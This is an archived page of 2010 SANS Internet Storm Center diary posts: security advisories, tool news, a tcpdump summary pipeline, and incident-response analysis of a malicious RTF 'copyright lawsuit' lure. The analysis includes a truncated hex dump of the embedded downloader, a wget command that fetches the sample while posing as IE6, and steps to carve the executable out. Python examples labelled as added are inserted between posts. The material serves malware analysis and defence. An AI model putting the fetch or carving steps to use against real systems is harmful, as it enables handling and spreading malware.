Diaries

Published: 2010-03-31

PDF Arbitrary Code Execution - vulnerable by design.

Didier Stevens, who probably knows the PDF format better than most and has written some great PDF analysis tools, published a very interesting and concerning blog post [1].

In this post, he outlines how PDFs can be used to execute code. Nothing new, you may say... plenty of exploits have done this in the past. This is different: he is not using a vulnerability, but a feature. Evidently, PDFs have the ability to execute code by design. Since this is a design problem rather than an implementation problem, various PDF readers are vulnerable. In his blog, Didier shows a video of the exploit using Adobe's PDF reader. Adobe's reader will show a warning and ask the user for permission. However, the wording of this warning may be changed by the attacker. Foxit, a popular alternative to Adobe's reader, will show no warning.

At this point, Didier does not provide a public PoC exploit. However, he says he is in contact with vendors.

 

[1] http://blog.didierstevens.com

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

2 Comments

Published: 2010-03-30

Sharing the Tools


In the malware analysis world, you have to have the tools you feel most comfortable using; otherwise, a task that could be
accomplished in 10 minutes will take hours.

But sometimes, finding the right tool for the task can be quite a challenge. This is one of the reasons I decided to create a site,
called www.mysectools.com, where I can share some tools that have been quite valuable in my day-to-day malware analysis tasks.

Now, I would like to comment on two tools that I was recently introduced to.

The first one is not directly related to malware analysis (at least in concept), since it is more of a development tool. It is called
WinAPIOverride32.
It is actually a package/suite with 3 different tools, but the one I like most is dumper.exe, because sometimes you want more
than just a click-and-dump application. This one gives you the freedom to choose what and how you want to dump a module, for example.

The second one is an anti-rootkit tool called XueTr, which honestly I didn't try
outside a controlled environment (VMware, etc.).

This is another quite powerful tool, which in some ways reminds me of IceSword, which I would recommend checking out if you don't know it.

Happy Malware Analysis!

----------------------------------------------------------------

Pedro Bueno (pbueno /%%/ isc. sans. org)

Twitter: http://twitter.com/besecure

www.mysectools.com

 

3 Comments

Published: 2010-03-30

Zigbee Analysis Tools

At today's SANS SCADA Conference in Orlando Josh Wright of InGuardians gave a very interesting talk on Zigbee security.  Josh is leading a project to build a framework for Zigbee analysis tools that he calls "Killerbee".  From the project website:

KillerBee is a Python based framework and tool set for exploring and exploiting the security of ZigBee and IEEE 802.15.4 networks. Using KillerBee tools and a compatible IEEE 802.15.4 radio interface, you can eavesdrop on ZigBee networks, replay traffic, attack cryptosystems and much more. Using the KillerBee framework, you can build your own tools, implement ZigBee fuzzing, emulate and attack end-devices, routers and coordinators and much more.

Let us know via our contact page or via the comment link below if you are doing any Zigbee experimentation and what you've learned so far.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2010-03-30

VMWare Security Advisories Out

Update: Tuesday:

...and there are new Java patches too: http://java.sun.com/javase/6/webnotes/ReleaseNotes.html

--------------------------------------

Yes, today is Monday, but we can already call it a week of patches/advisories.

We already got the Apple advisories, we already know about the MS out-of-band patch release tomorrow (March 30th), and today VMWare has released the following new and updated security advisories:

New - VMSA-2010-0005
http://lists.vmware.com/pipermail/security-announce/2010/000086.html

Updated - VMSA-2009-0016.5
http://lists.vmware.com/pipermail/security-announce/2010/000087.html

Updated - VMSA-2010-0002.1
http://lists.vmware.com/pipermail/security-announce/2010/000088.html

Enjoy! Today is Monday! :)

 

------------------------------------------------------------------

Pedro Bueno (pbueno /%%/ isc. sans. org)

Twitter: http://twitter.com/besecure

http://www.mysectools.com

1 Comments

Published: 2010-03-29

OOB Update for Internet Explorer MS10-018

Microsoft Security Bulletin MS10-018 - Critical

This update resolves 10 different vulnerabilities in Internet Explorer, of which the most severe impact can be execution of arbitrary code. All versions of IE from 5.01 to 8.0 are affected to varying degrees. Both servers and workstations should be updated. The update replaces MS10-002, and addresses the MS Advisory 981374 vulnerability. Time to patch! It is a cumulative update.

Here is a listing of the related vulnerabilities and CVE entries:
Uninitialized Memory Corruption Vulnerability - CVE-2010-0267   
Post Encoding Information Disclosure Vulnerability - CVE-2010-0488   
Race Condition Memory Corruption Vulnerability - CVE-2010-0489   
Uninitialized Memory Corruption Vulnerability - CVE-2010-0490   
HTML Object Memory Corruption Vulnerability - CVE-2010-0491   
HTML Object Memory Corruption Vulnerability - CVE-2010-0492   
HTML Element Cross-Domain Vulnerability - CVE-2010-0494   
Memory Corruption Vulnerability - CVE-2010-0805   
Uninitialized Memory Corruption Vulnerability - CVE-2010-0806   
HTML Rendering Memory Corruption Vulnerability - CVE-2010-0807

http://blogs.technet.com/msrc/archive/2010/03/30/security-bulletin-ms10-018-released.aspx

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.

2 Comments

Published: 2010-03-29

Nmap 5.30BETA1 released

Nmap 5.30BETA1 is out. Many new features, new NSE scripts, nping, some syntax changes, some bug fixes and more. Nmap is hands down one of my favourite tools and a must-have for any technical information security professional. Much more information and downloads are available, as always, at: http://nmap.org/

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.

0 Comments

Published: 2010-03-29

OpenSSL V 1.0.0 released!

OpenSSL 1.0.0 is now available, a major release!

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.

0 Comments

Published: 2010-03-29

APPLE-SA-2010-03-29-1 Security Update 2010-002 / Mac OS X v10.6.3

Apple has published a security update covering a number of issues, with varying impacts.

Security Update 2010-002 / Mac OS X v10.6.3 is now available and addresses the following:

AppKit:  CVE-ID:  CVE-2010-0056
Application Firewall:  CVE-ID:  CVE-2009-2801
AFP Server:  CVE-ID:  CVE-2010-0057, CVE-2010-0533
Apache:  CVE-ID:  CVE-2009-3095
ClamAV:  CVE-ID:  CVE-2010-0058
CoreAudio:  CVE-ID:  CVE-2010-0059, CVE-2010-0060
CoreMedia:  CVE-ID:  CVE-2010-0062
CoreTypes:  CVE-ID:  CVE-2010-0063
CUPS:  CVE-ID:  CVE-2010-0393
curl:  CVE-ID:  CVE-2009-2417, CVE-2009-0037
Cyrus IMAP:  CVE-ID:  CVE-2009-2632
Cyrus SASL:  CVE-ID:  CVE-2009-0688
DesktopServices:  CVE-ID:  CVE-2010-0064, CVE-2010-0537
Disk Images: CVE-ID:  CVE-2010-0065, CVE-2010-0497
Directory Services:  CVE-ID:  CVE-2010-0498
Dovecot:  CVE-ID:  CVE-2010-0535
Event Monitor:  CVE-ID:  CVE-2010-0500
FreeRADIUS:  CVE-ID:  CVE-2010-0524
FTP Server:  CVE-ID:  CVE-2010-0501
iChat Server:  CVE-ID:  CVE-2006-1329, CVE-2010-0502, CVE-2010-0503, CVE-2010-0504
ImageIO:  CVE-ID:  CVE-2010-0505, CVE-2010-0041, CVE-2010-0042, CVE-2010-0043
Image RAW:  CVE-ID:  CVE-2010-0506, CVE-2010-0507
Libsystem:  CVE-ID:  CVE-2009-0689
Mail:  CVE-ID:  CVE-2010-0508, CVE-2010-0525
Mailman:  CVE-ID:  CVE-2008-0564
MySQL:  CVE-ID:  CVE-2008-4456, CVE-2008-7247, CVE-2009-2446, CVE-2009-4019, CVE-2009-4030
OS Services:  CVE-ID:  CVE-2010-0509
Password Server:  CVE-ID:  CVE-2010-0510
perl:  CVE-ID:  CVE-2008-5302, CVE-2008-5303
PHP:  CVE-ID:  CVE-2009-3557, CVE-2009-3558, CVE-2009-3559, CVE-2009-4017, CVE-2009-3557, CVE-2009-3558, CVE-2009-3559, CVE-2009-4142, CVE-2009-4143
Podcast Producer:  CVE-ID:  CVE-2010-0511
Preferences:  CVE-ID:  CVE-2010-0512
PS Normalizer:  CVE-ID:  CVE-2010-0513
QuickTime:  CVE-ID:  CVE-2010-0062, CVE-2010-0514, CVE-2010-0515, CVE-2010-0516, CVE-2010-0517, CVE-2010-0518, CVE-2010-0519, CVE-2010-0520, CVE-2010-0526
Ruby:  CVE-ID:  CVE-2009-2422, CVE-2009-3009, CVE-2009-4214, CVE-2009-1904
Server Admin:  CVE-ID:  CVE-2010-0521, CVE-2010-0522
SMB:  CVE-ID:  CVE-2009-2906
Tomcat:  CVE-ID:  CVE-2009-0580, CVE-2009-0033, CVE-2009-0783, CVE-2008-5515, CVE-2009-0781, CVE-2009-2901, CVE-2009-2902, CVE-2009-2693
unzip:  CVE-ID:  CVE-2008-0888
vim:  CVE-ID:  CVE-2008-2712, CVE-2008-4101, CVE-2009-0316
Wiki Server:  CVE-ID:  CVE-2010-0523, CVE-2010-0534
X11:  CVE-ID:  CVE-2009-2042, CVE-2003-0063
xar:  CVE-ID:  CVE-2010-0055

To download: http://www.apple.com/support/downloads/
For more information:

http://support.apple.com/kb/HT1222

http://support.apple.com/kb/HT4014

http://support.apple.com/kb/HT4015

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.

0 Comments

Published: 2010-03-28

Honeynet Project: 2010 Forensic Challenge #3

If you like a good InfoSec puzzle the good people over at the Honeynet Project are at it again.  They have just released Challenge #3 in their 2010 Forensic Challenge series.

This time they want you to analyze an image from a suspected infected workstation for a user who has discovered suspicious banking transactions.  There is swag involved, and submissions are due by April 18th.

Results of the previous two challenges are available from the Honeynet Project Challenges page.

Have fun!

-- Rick Wanner - rwanner at isc dot sans dot org

0 Comments

Published: 2010-03-27

Create a Summary of IP Addresses from PCAP Files using Unix Tools

Every once in a while we collect large PCAP files for analysis. However, there are times when we are looking for a summary list of either source or destination addresses seen in those PCAP files over a period of time. The two examples shown here cover two suspicious ports that I noticed being targeted this week, where I wanted to know the source IPs of this traffic.

First, if needed, we remove the IP or IPs we don't want to include in our summary. If we are going to reuse a PCAP filter several times, it is better to save the libpcap filter in a file and load it with tcpdump -F (tcpdump -nr file.pcap -F parsing_filter).


Breaking down the filter

In order to manipulate the data to our advantage, we need to determine what we are looking for. In our two examples, we are going to find which source IP addresses sent a TCP SYN packet to our gateway IP 192.168.21.32 on ports 465 and 2522, along with the number of occurrences in each of the PCAP files.

My complete traffic parsing looks like this:

guy@seeker$ tcpdump -ntr 2010032501 'dst host 192.168.21.32 and tcp[13] = 0x02 and dst port 2522' | awk '{print $2}' | tr . ' ' | awk '{print $1"."$2"."$3"."$4}' | sort | uniq -c | awk ' {print $2 "\t" $1 }'

reading from file 2010032501, link-type LINUX_SLL (Linux cooked)
XX.169.170.84 10

Breaking Down Each Section

- Part 1 is the tcpdump switches: we are using -n (don't resolve names), -t (don't print date/time) and -r 2010032501 (file name to replay).

- Part 2 is the libpcap filter ('dst host 192.168.21.32 and tcp[13] = 0x02 and dst port 2522'), which selects all inbound TCP SYN packets (tcp[13] = 0x02) to our gateway (dst host 192.168.21.32) on TCP port 2522.

IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,nop,wscale 3,nop,nop,timestamp 895725079 0,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,nop,wscale 3,nop,nop,timestamp 895725088 0,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,nop,wscale 3,nop,nop,timestamp 895725098 0,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,sackOK,eol>


- Part 3 we add a pipe with awk (| awk '{print $2}') to print only the source IP from our tcpdump result. Field $2 (source IP) could be changed to $4 to use the destination address.

reading from file 2010032501, link-type LINUX_SLL (Linux cooked)
xx.169.170.84.50316
xx.169.170.84.50316
xx.169.170.84.50316
xx.169.170.84.50316
xx.169.170.84.50316
xx.169.170.84.50316
xx.169.170.84.50316
xx.169.170.84.50316
xx.169.170.84.50316
xx.169.170.84.50316


- Part 4 we add a pipe with tr (| tr . ' ') to change the period to a space so we can remove the source port (50316) in the next step.

reading from file 2010032501, link-type LINUX_SLL (Linux cooked)
xx 169 170 84 50316
xx 169 170 84 50316
xx 169 170 84 50316
xx 169 170 84 50316
xx 169 170 84 50316
xx 169 170 84 50316
xx 169 170 84 50316
xx 169 170 84 50316
xx 169 170 84 50316

- Part 5 we add a pipe with awk (| awk '{print $1"."$2"."$3"."$4}') to reconstruct the source IP address(es).

reading from file 2010032501, link-type LINUX_SLL (Linux cooked)
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84

- Part 6 we add a pipe with sort (| sort) to sort our traffic by IP. In this case we only have one source.

reading from file 2010032501, link-type LINUX_SLL (Linux cooked)
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84

- Part 7 we add a pipe with uniq -c (| uniq -c) to count the number of times a source IP was seen in the PCAP file.

reading from file 2010032501, link-type LINUX_SLL (Linux cooked)

10 xx.169.170.84

- The last part is just for formatting purposes: we reverse the order of the previous output and insert a tab (| awk ' {print $2 "\t" $1 }') to show the IPs in the first column and the number of times seen in the second.

reading from file 2010032501, link-type LINUX_SLL (Linux cooked)

xx.169.170.84 10

 

Another example, with its results, for destination port TCP 465.

guy@seeker$ tcpdump -ntr 2010032508 'dst host 192.168.21.32 and tcp[13] = 0x02 and dst port 465' | awk '{print $2}' | tr . ' ' | awk '{print $1"."$2"."$3"."$4}' | sort | uniq -c | awk ' {print $2 "\t" $1 }'

reading from file 2010032508, link-type LINUX_SLL (Linux cooked)

XX.237.148.241 3
XXX.197.208.107 3
XXX.199.183.68 3
XXX.22.87.36 3
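The same summary as the pipeline above, as an added Python example (not code from the diary): it parses each tcpdump line by its "IP src.port > dst.port:" shape rather than by awk field position, so a leading timestamp (no -t) or an IPv6 record does not throw the counts off. SAMPLE is constructed output, and summarize_endpoints/format_rows are names chosen here.

```python
import re
from collections import Counter

# Constructed "tcpdump -n" output (not the diary's capture).  The fifth line
# keeps the timestamp that -t would suppress and the sixth is an IPv6 record;
# both shift or break the awk/tr field positions used in the diary's pipeline.
SAMPLE = """\
reading from file sample.pcap, link-type LINUX_SLL (Linux cooked)
IP 10.0.0.5.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,sackOK,eol>
IP 10.0.0.5.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,sackOK,eol>
IP 172.16.9.7.4411 > 192.168.21.32.2522: S 7:7(0) win 8192
09:15:02.123456 IP 10.0.0.5.50317 > 192.168.21.32.465: S 2:2(0) win 65535
IP6 fe80::1.546 > ff02::1:2.547: dhcp6 solicit
"""

# Address part of an IPv4 tcpdump record: "IP <src>.<sport> > <dst>.<dport>:".
# Anchoring on the "IP" token instead of a field number means an optional
# leading timestamp does not shift anything, and IP6/ARP lines never match.
LINE_RE = re.compile(
    r"(?:^|\s)IP (?P<src>\d{1,3}(?:\.\d{1,3}){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3})\.(?P<dport>\d+):"
)


def summarize_endpoints(lines, side="src"):
    """Count distinct IPv4 addresses on one side of each record.

    side is "src" or "dst" (the diary's $2 / $4 choice).  Returns
    (rows, skipped): rows is a list of (ip, count) sorted by count
    descending, then by address; skipped is the number of lines that were
    not IPv4 tcpdump records (the 'reading from file' banner, IPv6, ...).
    """
    if side not in ("src", "dst"):
        raise ValueError("side must be 'src' or 'dst'")
    counts = Counter()
    skipped = 0
    for line in lines:
        match = LINE_RE.search(line)
        if match is None:
            skipped += 1
            continue
        # The port is captured as a separate group, so only the dotted quad
        # is counted: this replaces the tr and awk '{print $1"."$2...}' steps.
        counts[match.group(side)] += 1
    rows = sorted(counts.items(), key=lambda item: (-item[1], item[0]))
    return rows, skipped


def format_rows(rows):
    """IP<TAB>count, the layout produced by the diary's final awk step."""
    return "\n".join(f"{ip}\t{count}" for ip, count in rows)


if __name__ == "__main__":
    # With a real capture:  tcpdump -ntr file.pcap '<filter>' | python3 this.py
    import sys
    source = SAMPLE.splitlines() if sys.stdin.isatty() else sys.stdin
    rows, skipped = summarize_endpoints(source, "src")
    print(format_rows(rows))
    print(f"# {skipped} non-IPv4 line(s) skipped", file=sys.stderr)
```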

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org

8 Comments

Published: 2010-03-27

HP-UX Running NFS/ONCplus, Inadvertently Enabled NFS

HP issued a security bulletin for HP-UX 11.31 running NFS/ONCplus version B.11.31_08 or prior: when NFS/ONCplus is running, NFS may be inadvertently enabled, allowing a remote user to access NFS shares on the target system. The complete list of affected versions and the resolution is available here.

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org

Interested in taking SANS Sec 503 in French?
Register at http://www.sans.org/nice-2010/ for SANS Community Nice, France, June 21 to 26, 2010

0 Comments

Published: 2010-03-26

SIFT2.0 SANS Investigative Forensics Toolkit released

SANS Faculty Fellow Rob Lee created the SANS Investigative Forensic Toolkit (SIFT) Workstation, which is also featured in the SANS FOR 508 course, in order to show that advanced investigations and investigating hackers can be accomplished using freely available open-source tools. The new version of SIFT was just released and is a VMware appliance that is pre-configured with all the necessary tools to perform a detailed digital forensic examination. More information on the SANS forensics curriculum and SIFT 2.0 can be found at https://computer-forensics.sans.org/ and in the download section on that page.

9 Comments

Published: 2010-03-26

Getting the EXE out of the RTF again

Since we got some mails from readers who had trouble getting the malware extraction technique described in http://isc.sans.org/diary.html?storyid=6703 to work on yesterday's malicious "copyright lawsuit" sample, here's a quick walk-through again on how to carve an EXE out of a DOC or RTF file.

$ file suit_documents.doc
suit_documents.doc: Rich Text Format data, version 1, ANSI

Hmm, looks like this DOC is an RTF ... Let's see what it contains

$ head suit_documents.doc
{\rtf1\ansi\ansicpg1252\deff0{\fonttbl{\f0\fswiss\fcharset0 Arial;}}
{\*\generator Msftedit 5.41.15.1515;}\viewkind4\uc1\pard\lang1033\f0\fs20{\object\objemb{\*\objclass Package}\objw795\objh765{\*\objdata
01050000
02000000
08000000
5061636b61676500
00000000
00000000
6f740000
0200646f63732e70646600433a5c446f63756d656e747320616e642053657474696e67735c4164

OK .. this does indeed look like an RTF with an embedded object. The pile of numbers is the embedded object's bytes written out in hex, but before we can convert them back to actual bytes, we first have to strip away the initial two lines, because their presence would confuse the Perl statement that follows later.

$ cat suit_documents.doc | sed '1,2d' > suit1.temp
$ head suit1.temp
01050000
02000000
08000000
5061636b61676500
00000000
00000000
6f740000
0200646f63732e70646600433a5c446f63756d656e747320616e642053657474696e67735c4164

Now, we are ready for the transformation from Hex ASCII codes to printable characters:

$ cat suit1.temp | perl -ne 's/(..)/print(chr(hex($1)))/ge' > suit2.temp

So far, the old method still seems to work: We locate "objdata" in the RTF document, strip out everything in front, then feed the blob into Perl to convert the hexadecimal codes to actual ASCII characters. I changed the Perl command slightly compared to the earlier diary on the subject, because one of the problems that people seem to have is related to how "end of line" is treated on Windows vs Unix. The earlier version

$ cat detail.rtf | sed -e '1,3d' | perl -ne 's/(..)/print chr(hex($1))/ge' > detail.bin

kept any DOS line terminators unchanged, which doesn't bode well for the resulting executable.  The new version

$ cat suit1.temp | perl -ne 's/(..)/print(chr(hex($1)))/ge' > suit2.temp

is now really only printing out converted hex codes, and is dropping all the CR/LF line terminators that are present in the original file after every line. The resulting file is still in "Object Package" format, but if you look closely, you can see the tell-tale "MZ" that marks the start of an executable:

What makes this case a bit more convoluted than last year's example is that the bad guys tried real hard to disguise the contents. This time, the initial file had a .DOC extension but was in fact in .RTF format, which contained an embedded COMPLA~1.EXE that had a harmless-looking icon (3.ico) and was displayed to the user as "docs.pdf". Yup, pretty sneaky. You can see all these file names in the hex output above.

Now, how to get the EXE out. According to the earlier diary mentioned above, the bytes between the EXE filename and the "MZ" header give the size of the executable that we need to cut out. In this case, we have "00 10 74 00 00" in that position:

00000070 4c 41 7e 31 2e 45 58 45 00 10 74 00 00 4d 5a 90 |LA~1.EXE..t..MZ.|

What my earlier example didn't make clear is that these bytes have to be read "right to left" to determine the size, because the value is stored little-endian. In the current case, the size is 0x007410, which converts to 29712 bytes.

Let's carve it out. We need to skip to offset 0x7D (=125) from the beginning of the file to get to the "MZ" marker, and from there, the EXE should be 29712 bytes long.

$ dd if=suit2.temp of=suit2.exe skip=125 count=29712 bs=1
29712+0 records in
29712+0 records out
29712 bytes (30 kB) copied, 0.15203 s, 195 kB/s

$ md5sum suit2.exe
ead062fb0aca0e3d0e8c12c4cf095765 suit2.exe

Voilà! Now, we can use this hash on http://www.virustotal.com/buscaHash.html to see if someone else has analyzed this file before :) 
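The carving steps above (strip the RTF header, decode the hex, read the little-endian length in front of "MZ", cut at 0x7D) as an added Python example, not code from the diary: it walks the Package object's fields instead of hard-coding the offset, so dd's skip and count fall out of the structure. build_package, wrap_in_rtf and FAKE_EXE are assumptions used to construct a stand-in sample with the diary's file names; the payload is filler, not the malware.

```python
import re
import struct

# Constructed stand-in for the embedded executable (not the diary's sample):
# an MZ signature plus filler is enough for the carver to find and measure it.
FAKE_EXE = b"MZ\x90\x00" + b"NOT-A-REAL-PROGRAM " * 3

def build_package(label, orig_path, tmp_path, data):
    """OLE1 'Package' object laid out like the diary's hex dump: OLE version,
    format id, class name, two empty names, then the native data (label,
    original path, flags, temp path, 32-bit payload length, payload)."""
    native = (b"\x02\x00" + label + b"\x00" + orig_path + b"\x00"
              + b"\x00\x00\x03\x00"                       # flags / format id
              + struct.pack("<I", len(tmp_path) + 1) + tmp_path + b"\x00"
              + struct.pack("<I", len(data)) + data)      # the bytes before MZ
    return (struct.pack("<III", 0x501, 2, 8) + b"Package\x00"
            + struct.pack("<II", 0, 0)                    # no topic/item names
            + struct.pack("<I", len(native)) + native)

def wrap_in_rtf(package, crlf=True):
    """Hex-encode the object into an RTF \\objdata group, 78 digits per line;
    crlf=True mimics the DOS line endings that tripped the first one-liner."""
    eol = "\r\n" if crlf else "\n"
    hexdata = package.hex()
    lines = [hexdata[i:i + 78] for i in range(0, len(hexdata), 78)]
    rtf = ("{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Package}{\\*\\objdata"
           + eol + eol.join(lines) + "}}}")
    return rtf.encode("ascii")

def extract_objdata(rtf_bytes):
    """Decode the first \\objdata hex blob, dropping CR, LF and spaces between
    digits (what the diary's sed + perl steps do)."""
    match = re.search(rb"objdata\s*([0-9a-fA-F\s]+)", rtf_bytes)
    if match is None:
        raise ValueError("no objdata group found")
    return bytes.fromhex(re.sub(rb"\s", b"", match.group(1)).decode("ascii"))

def parse_package(blob):
    """Walk the Package structure; return the embedded file's names, offset
    (dd's skip=), size (the little-endian 32-bit value right before 'MZ',
    hence 'read right to left') and bytes."""
    pos = 0

    def u32():
        nonlocal pos
        (value,) = struct.unpack_from("<I", blob, pos)
        pos += 4
        return value

    def cstring():
        nonlocal pos
        end = blob.index(b"\x00", pos)
        value, pos = blob[pos:end], end + 1
        return value

    u32()                                    # OLE version, 01 05 00 00
    u32()                                    # format id, 2 = embedded
    name_len = u32()
    class_name = blob[pos:pos + name_len].rstrip(b"\x00")
    pos += name_len
    if class_name != b"Package":
        raise ValueError("not a Package object: %r" % class_name)
    topic_len = u32()
    item_len = u32()
    pos += topic_len + item_len              # both zero in the diary's sample
    native_len = u32()
    native_end = pos + native_len
    pos += 2                                 # native data header, 02 00
    label = cstring()                        # name shown to the user ("docs.pdf")
    orig_path = cstring()                    # original path, here the .ico decoy
    pos += 4                                 # 00 00 03 00
    tmp_len = u32()
    tmp_path = blob[pos:pos + tmp_len].rstrip(b"\x00")    # "C:\COMPLA~1.EXE"
    pos += tmp_len
    data_len = u32()
    if pos + data_len > native_end or blob[pos:pos + 2] != b"MZ":
        raise ValueError("payload length or MZ signature does not check out")
    return {"label": label, "orig_path": orig_path, "tmp_path": tmp_path,
            "offset": pos, "size": data_len, "data": blob[pos:pos + data_len]}

def carve_exe(rtf_bytes):
    """RTF bytes in, carved executable and its metadata out."""
    return parse_package(extract_objdata(rtf_bytes))

def demo():
    """The diary's file names with the fake payload: the executable lands at
    offset 125 (0x7D), exactly where the diary's dd had to skip to."""
    package = build_package(
        b"docs.pdf",
        b"C:\\Documents and Settings\\Administrator\\Desktop\\3.ico",
        b"C:\\COMPLA~1.EXE", FAKE_EXE)
    return carve_exe(wrap_in_rtf(package))
```

On a real sample, read the .doc/.rtf as bytes, call carve_exe, and write info["data"] to a file; the size check against the native data length catches a truncated or tampered length field before anything is written.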

 

 

1 Comments

Published: 2010-03-25

Zeus wants to do your taxes

I've received reports of suspicious emails claiming to be from the IRS.  It's a common scheme to get a user to click and run an executable.

It looks like Zeus/Zbot to me (more on that here: https://zeustracker.abuse.ch/faq.php; their cert is a little non-standard), but I can't share the details yet.  If you've received one of these emails and don't mind sharing the details with our readers, please submit a copy (via http://isc.sans.org/contact.html).

If you want to check out your own logs in the meantime, I'd suggest looking for domains that look like www.irs.gov.<stuff> and downloaded executables with the word "tax" in them.

For those with enough free-time to try to track the different groups using zeus, this one has an Avalanche feel to it.

0 Comments

Published: 2010-03-25

Responding to "Copyright Lawsuit filed against you"

The Scenario:

Let's say you're responsible for responding to an email like the one reported here: https://isc.sans.org/diary.html?storyid=8497

Assess:

Is this email a problem?

It certainly appears to be appealing to the recipient's fears with scary legal language.  There's a typo or two in there that might make you suspicious.  Real or not, a document like this should be brought to the attention of your security/legal departments.  So it's likely a problem of one sort or another.

What is it?

You could start by checking into the source of the email and the domain hosting the link.  In this case, the originator appears to be a mail-server for a small city.  The domain has been around for nearly a year, but was just updated a few days ago.  Domaintools.com is your friend.

If you're equipped for it, you may want to start by checking out the document by pulling it down to a safe machine.  In my case it's a Unix box, since it appears to be a Word document.  I craft a simple wget script to pull the file down while looking like a vulnerable version of IE.

wget --save-cookies=./cookies -U "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "$1"

Curiosity getting the better of me, I look at the file a bit and see:

{\rtf1\ansi\ansicpg1252\deff0{\fonttbl{\f0\fswiss\fcharset0 Arial;}}
{\*\generator Msftedit 5.41.15.1515;}\viewkind4\uc1\pard\lang1033\f0\fs20{\object\objemb{\*\objclass Package}\objw795\objh765{\*\objdata
01050000
02000000
08000000
5061636b61676500
00000000
00000000
6f740000
0200646f63732e70646600433a5c446f63756d656e747320616e642053657474696e67735c4164
6d696e6973747261746f725c4465736b746f705c332e69636f000000030010000000433a5c434f
4d504c417e312e45584500107400004d5a90000300000004000000ffff0000b800000000000000
400000000000000000000000000000000000000000000000000000000000000000000000d00000
000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072
756e20696e20444f53206d6f64652e0d0d0a240000000000000009d117d84db0798b4db0798b4d
b0798b4db0788b51b0798b2faf6a8b48b0798b4b93728b49b0798b8ab67f8b4cb0798bb2907d8b
4cb0798b526963684db0798b00000000000000000000000000000000504500004c0104000fd8a9
4b0000000000000000e0000f010b010600001e00000052000000000000c02a0000001000000030
00000000400000100000000200000400000000000000040000000000000000a000000004000000
000000020000000000100000100000000010000010000000000000100000003033000052000000
...

Yeah, that doesn't look good.  Let's calculate an md5sum and see what others think of it.

$ md5sum suit_documents.doc
6db76304a2aff6bef94364b86abd8b7f  suit_documents.doc

Since you're a lone responder and don't have an army of reverse engineers on your staff, we'll leverage this information to see what the group-mind knows about this.

I use the hash-search at virus total to see if someone's already working on this: http://www.virustotal.com/buscaHash.html

In this case, this yields the following results: http://www.virustotal.com/analisis/9b762ff9d2103022bf1476f2c55db91475f31526522716e827875801f92a0d87-1269529133

Some interesting things come back: we know that this is likely some sort of downloader disguised as a document.

I'll also search through http://www.threatexpert.com/ by the md5sum to see if it has already been analyzed.  In this case it hasn't.  I could ship it off there for analysis, or to one of the other fine sandbox tools such as Anubis (http://anubis.iseclab.org) or CWSandbox (http://mwanalysis.org/).

Looking at the earlier diary entry we see results from Anubis showing some network activity.  Now we have a couple of things to look for to measure impact:

  • Email details to search our mail-logs to determine who received the lure message.
  • The URL of the initial downloader to see who clicked on it and brought it into the network.
  • The network behavior of a system that executed the code.

How bad is it for us?

Using those details it's time to evaluate the impact this attack has had on your firm.  If you have anyone who downloaded the file, or evidence of a machine reaching out for the next-stage then you pull your Malware Incident response document off of the shelf and follow that.  We all have differing levels of documentation to refer to, but there's always some sort of plan, even if it's "update resume."

Protect

While you're assessing the impact (greps take a while to run sometimes), you have some information that you can leverage to protect the people in your network.  You have email addresses and URLs to block and malware to submit to your vendor (assuming they're not on the VirusTotal list, like mine wasn't).  Acting quickly on this protection phase makes your clean-up phase go easier.

Respond/Clean-up

Now that you have your list of machines that were exposed and your Malware incident response document handy, you follow that to make your systems and network all shiny and clean.

Report

This step is important. 

In my environment, my boss likes to know what it is that I'm doing in the dark data closet.  So keeping track of the event, its impact, etc. is good not only for tracking the incident, but also for review time.

When you were researching the IP that sent the email and the host serving the URL (you still have that up in a browser, right?), it is also critical that you report it to the abuse contacts.  Send a kind email reporting the issue (because they'll likely get a few reports, and most of them might not be so kind), which helps more than just your own environment.

Learning from Others/Helping Others

You will want to follow a similar process in response to events reported here and in other blogs and media.  It not only helps protect you from what is hitting other folks, but you may also uncover a gap in your internal detection process.

By submitting malicious URLs to proxy-filter vendors and malware to AV vendors, you help protect not only your environment but also your neighbors.  If fewer of your neighbors are getting infected, then that's fewer spam-bots and phishing sites that eventually target you.

3 Comments

Published: 2010-03-25

